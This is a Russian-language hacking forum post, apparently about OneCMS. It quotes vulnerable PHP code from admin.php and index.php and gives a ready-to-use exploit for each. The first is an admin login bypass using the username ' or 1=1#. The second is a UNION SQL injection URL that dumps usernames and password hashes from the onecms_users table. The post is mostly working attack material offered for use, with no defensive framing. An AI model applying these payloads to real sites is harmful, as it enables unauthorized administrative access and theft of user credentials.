04.03.2010, 21:43
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Ctacok
Там ещё в админке auth By pass, но чо то редирект глючный, проверьте у себя
хм.. у меня всё нормально..
1) By pass (требования: mq=off)
file: admin.php
PHP код:
if ($_GET['load'] == "login") {
$admin_page = "yes";
if ($_GET['login'] == "yes") {
$usernameb = check(stripcslashes($_POST['username']));
$passwordc = check($_POST['password']);
$passwordb = md5($passwordc);
$sql = mysql_query("SELECT * FROM ".$pre."users WHERE username = '".$usernameb."' AND password = '".$passwordb."' LIMIT 1");
$login_check = mysql_num_rows($sql);
result:
login: ' or 1=1#
pass: -
2) sql injection (требования: mq=off)
file:index.php
PHP код:
if ($_GET['user']) {
$row = mysql_fetch_row(mysql_query("SELECT aim,msn,website,nickname,location,username,yahoo,icq,gtalk,birthday,id FROM ".$pre."profile WHERE username = '".$_GET['user']."'"));
echo profile($row[10], $_GET['user']);
}
result:
Код:
/index.php?load=elite&user=1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11+from+onecms_users+--+
Последний раз редактировалось .:[melkiy]:.; 04.03.2010 в 21:57..
|
|
|